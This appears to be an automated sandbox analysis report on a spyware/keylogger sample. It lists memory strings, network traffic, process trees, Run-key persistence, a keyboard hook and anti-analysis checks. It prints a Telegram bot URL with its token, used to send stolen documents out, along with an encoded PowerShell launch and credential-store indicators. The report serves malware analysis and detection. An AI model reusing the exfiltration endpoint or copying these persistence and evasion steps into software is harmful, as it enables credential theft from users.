Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.603231673.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.592591106.0000000004BAF000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.640909685.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.603231673.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.592591106.0000000004BAF000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.640909685.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0O
Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe, 00000004.00000002.618527573.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                Source: kDPmkTm.exe, 00000013.00000002.653315830.0000000006C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.s
                Source: file.exe, 00000004.00000002.618527573.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                Source: Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                Source: Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org4
                Source: file.exe, 00000004.00000002.618527573.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.00000000034D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/
                Source: file.exe, 00000004.00000002.618527573.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.00000000034D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument
                Source: file.exe, 00000004.00000002.618527573.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.00000000034D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4
                Source: file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.390593122.0000000005710000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_see
                Source: kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                Source: kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                Source: unknownHTTP traffic detected: POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8db29b545d5b5a8Host: api.telegram.orgContent-Length: 972Expect: 100-continueConnection: Keep-Alive
                Source: unknownDNS traffic detected: queries for: api.ipify.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: unknown | HTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.4:49697 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49698 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.4:49700 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49702 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: C:\Users\user\Desktop\file.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\file.exe
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
                Source: file.exe, 00000000.00000002.384459373.0000000000E50000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                Source: C:\Users\user\Desktop\file.exe | Window created: window name: CLIPBRDWNDCLASS
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Window created: window name: CLIPBRDWNDCLASS
                Source: file.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_056E4A80
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_056E2369
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_056E2378
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_056E4A72
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_056E152F
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0123C978
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0123A9B8
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01239DA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0123A0E8
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_06980870
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_069855C0
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0698C8AC
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_06C46210
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_06C430A8
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_06C48E18
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_06C42370
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_06C4237C
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_06C43080
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_06C43000
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_06C4CD99
                Source: file.exe, 00000000.00000002.385810798.0000000002D14000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs file.exe
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs file.exe
                Source: file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs file.exe
                Source: file.exe, 00000000.00000002.388743810.0000000003D59000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs file.exe
                Source: file.exe, 00000000.00000003.372912348.00000000055E1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMtzdyotephm.exe" vs file.exe
                Source: file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTmonzgkzafmfijmsj.dll" vs file.exe
                Source: file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs file.exe
                Source: file.exe, 00000000.00000002.384459373.0000000000E50000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs file.exe
                Source: file.exe, 00000000.00000002.385810798.0000000002C81000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs file.exe
                Source: file.exe, 00000000.00000002.388743810.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs file.exe
                Source: file.exe, 00000000.00000000.305756685.0000000000840000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameMtzdyotephm.exe" vs file.exe
                Source: file.exe, 00000000.00000002.390593122.0000000005710000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTmonzgkzafmfijmsj.dll" vs file.exe
                Source: file.exe, 00000004.00000002.609344708.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs file.exe
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs file.exe
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs file.exe
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs file.exe
                Source: file.exe, 00000004.00000003.389929403.00000000066CF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMtzdyotephm.exe" vs file.exe
                Source: file.exe, 00000004.00000002.608064863.0000000000D68000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs file.exe
                Source: file.exe | Binary or memory string: OriginalFilenameMtzdyotephm.exe" vs file.exe
                Source: file.exe | ReversingLabs: Detection: 35%
                Source: file.exe | Virustotal: Detection: 44%
                Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
                Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknown | Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe "C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe"
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe "C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe"
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Process created: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Process created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\Uwztwjweuc
                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\CdFileMgr
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@22/15@8/3
                Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: file.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\file.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4136:120:WilError_01
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5020:120:WilError_01
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5680:120:WilError_01
                Source: C:\Users\user\Desktop\file.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: file.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
                Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: file.exe | Static file information: File size 1825280 > 1048576
                Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: file.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1bd000
                Source: file.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe

                Boot Survival

                Source: C:\Users\user\Desktop\file.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTm
                Source: C:\Users\user\Desktop\file.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Qasvjoldkyh

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | File opened: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\Desktop\file.exe TID: 5084 Thread sleep time: -25825441703193356s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 3848 Thread sleep count: 9732 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2120 Thread sleep time: -11990383647911201s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 4688 Thread sleep count: 9481 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -11990383647911201s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1200000s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1199875s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1199624s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1199498s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1199344s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1199203s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1199047s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1198938s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1198794s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1198680s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1198547s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1198420s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1198297s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1198170s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1198031s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1197921s >= -30000s
